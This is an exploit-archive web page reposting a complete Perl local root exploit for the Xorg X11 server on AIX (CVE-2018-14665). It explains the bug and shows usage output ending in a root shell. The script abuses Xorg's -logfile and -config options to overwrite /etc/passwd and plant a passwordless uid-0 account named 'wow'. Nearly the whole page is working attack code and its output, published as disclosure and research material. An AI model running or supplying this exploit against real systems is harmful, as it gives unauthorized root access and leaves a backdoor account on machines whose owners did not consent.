首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Xorg X11 Server (AIX) - Local Privilege Escalation 来源：@0xdono 作者：0xdono 发布时间：2018-12-05   # Exploit Title: AIX Xorg X11 Server - Local Privilege Escalation # Date: 29/11/2018 # Exploit Author: @0xdono # Original Discovery and Exploit: Narendra Shinde # Vendor Homepage: https://www.x.org/ # Platform: AIX # Version: X Window System Version 7.1.1 # Fileset: X11.base.rte < 7.1.5.32 # Tested on: AIX 7.1 (6.x to 7.x should be vulnerable) # CVE: CVE-2018-14665 # # Explanation: # Incorrect command-line parameter validation in the Xorg X server can # lead to privilege elevation and/or arbitrary files overwrite, when the # X server is running with elevated privileges. # The -logfile argument can be used to overwrite arbitrary files in the # file system, due to incorrect checks in the parsing of the option. # # This is a port of the OpenBSD X11 Xorg exploit to run on AIX. # It overwrites /etc/passwd in order to create a new user with root privile= ges.=20 # All currently logged in users need to be included when /etc/passwd is ove= rwritten, # else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to ch= ange user. # The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX= , # and is replaced by '-config'. # ksh93 is used for ANSI-C quoting, and is installed by default on AIX. # # IBM has not yet released a patch as of 29/11/2018. # # See also: # https://lists.x.org/archives/xorg-announce/2018-October/002927.html # https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html # https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl # # Usage: #  $ oslevel -s #  7100-04-00-0000 #  $ Xorg -version # =20 #  X Window System Version 7.1.1 #  Release Date: 12 May 2006 #  X Protocol Version 11, Revision 0, Release 7.1.1 #  Build Operating System: AIX IBM #  Current Operating System: AIX sovma470 1 7 00C3C6F54C00 #  Build Date: 07 July 2006 #          Before reporting problems, check http://wiki.x.org #          to make sure that you have the latest version. #  Module Loader present #  $ id #  uid=3D16500(nmyo) gid=3D1(staff) #  $ perl aixxorg.pl #  [+] AIX X11 server local root exploit #  [-] Checking for Xorg and ksh93=20 #  [-] Opening /etc/passwd=20 #  [-] Retrieving currently logged in users=20 #  [-] Generating Xorg command=20 #  [-] Opening /tmp/wow.ksh=20 #  [-] Writing Xorg command to /tmp/wow.ksh=20 #  [-] Backing up /etc/passwd to /tmp/passwd.backup=20 #  [-] Making /tmp/wow.ksh executable=20 #  [-] Executing /tmp/wow.ksh=20 #  [-] Cleaning up /etc/passwd and removing /tmp/wow.ksh=20 #  [-] Done=20 #  [+] 'su wow' for root shell=20 #  $ su wow #  # id #  uid=3D0(root) gid=3D0(system) #  # whoami #  root   #!/usr/bin/perl print "[+] AIX X11 server local root exploit\n";   # Check Xorg is in path print "[-] Checking for Xorg and ksh93 \n"; chomp($xorg =3D `command -v Xorg`); if ($xorg eq ""){=20     print "[X] Can't find Xorg binary, try hardcode it? exiting... \n";     exit; }   # Check ksh93 is in path chomp($ksh =3D `command -v ksh93`); if ($ksh eq ""){     print "[X] Can't find ksh93 binary, try hardcode it? exiting... \n";     exit; }   # Read in /etc/passwd print "[-] Opening /etc/passwd \n"; open($passwd_fh, '<', "/etc/passwd"); chomp(@passwd_array =3D <$passwd_fh>); close($passwd_fh);   # Retrieve currently logged in users print "[-] Retrieving currently logged in users \n"; @users =3D `who | cut -d' ' -f1 | sort | uniq`; chomp(@users);   # For all logged in users, add their current passwd entry to string # that will be used to overwrite passwd $users_logged_in_passwd =3D ''; foreach my $user (@users) {     $user .=3D ":";     foreach my $line (@passwd_array)     {         if (index($line, $user) =3D=3D 0) {             $users_logged_in_passwd =3D $users_logged_in_passwd . '\n' . $l= ine;         }     } }   # Use '-config' as '-fp' (which is used in the original BSD exploit) is not=  written to log print "[-] Generating Xorg command \n"; $blob =3D '-config ' . '$\'' . $users_logged_in_passwd . '\nwow::0:0::/:/us= r/bin/ksh\n#' . '\'';   print "[-] Opening /tmp/wow.ksh \n";=09=09 open($fr, '>', "/tmp/wow.ksh");   # Use ksh93 for ANSI-C quoting print "[-] Writing Xorg command to /tmp/wow.ksh \n"; print $fr '#!' . "$ksh\n"; print $fr "$xorg $blob -logfile ../etc/passwd :1  > /dev/null 2>&1 \n"; close $fr;   # Backup passwd=20 print "[-] Backing up /etc/passwd to /tmp/passwd.backup \n"; system("cp /etc/passwd /tmp/passwd.backup");   # Make script executable and run it print "[-] Making /tmp/wow.ksh executable \n"; system("chmod +x /tmp/wow.ksh"); print "[-] Executing /tmp/wow.ksh \n"; system("/tmp/wow.ksh");   # Replace overwritten passwd with: original passwd + wow user print "[-] Cleaning up /etc/passwd and removing /tmp/wow.ksh \n"; $result =3D `su wow "-c cp /tmp/passwd.backup /etc/passwd && echo 'wow::0:0= ::/:/usr/bin/ksh' >> /etc/passwd" && rm /tmp/wow.ksh`;   print "[-] Done \n"; print "[+] 'su wow' for root shell \n";   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Microsoft Lync for Mac 2011 - ·OpenSSH < 7.7 - User Enumerati ·HP Intelligent Management Java ·NUUO NVRMini2 3.9.1 - Authenti ·Emacs movemail Privilege Escal ·HasanMWB 1.0 SQL Injection ·NEC Univerge Sv9100 WebPro 6.0 ·Textpad 8.1.2 - Denial Of Serv ·Apache Superset 0.23 - Remote ·i-doit CMDB 1.11.2 - Remote Co ·Mozilla Firefox 63.0.1 - Denia ·FutureNet NXR-G240 Series Shel   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved